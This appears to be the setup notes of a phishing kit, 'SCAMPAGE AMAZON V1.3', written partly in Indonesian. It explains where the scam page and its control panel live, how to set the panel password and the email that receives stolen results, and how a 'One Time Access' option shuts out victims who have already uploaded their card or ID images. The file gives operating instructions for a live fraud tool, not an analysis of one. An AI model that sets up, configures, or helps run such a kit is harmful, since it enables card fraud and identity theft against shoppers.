.++===== SOMETHING SCAMPAGE AMAZON V1.3 =====++.
Default Access : 
Site : domain/?some
Panel : domain/Panel
Result Email RECOMMENDED Yahoo or Gmail.
.++===== END SOMETHING SCAMPAGE AMAZON V1.3 =====++.

.++===== INFO SCAMPAGE AMAZON V1.3 =====++.
Setting / Edit Dibagian
"CONFIG.PHP"
Fitur Panel : 
- Site Param (isi sesukamu) = ini adalah parameter untuk direct ke page scam, default "domain/?some"
- Password (isi sesukamu) = ini adalah password untuk membuka panel scam default "SOMETHING"
- One Time Access (block/non) = jika mengaktifkan "block" pada fitur ini akan otomatis bule yang sudah upload CC/IDCARD tidak akan bisa akses page scammu lagi.
.++===== END INFO SCAMPAGE AMAZON V1.3 =====++.

.++===== NOTIF SOMETHING SCAMPAGE AMAZON V1.3 =====++.
If there is an error or error, please contact the admin: https://www.facebook.com/founder.something
Quote of the day:
Hargai dia yg membencimu, karena dia adalah penggemar yg telah menghabiskan waktunya hanya tuk melihat setiap kesalahanmu.
.++===== NOTIF SOMETHING SCAMPAGE AMAZON V1.3 =====++.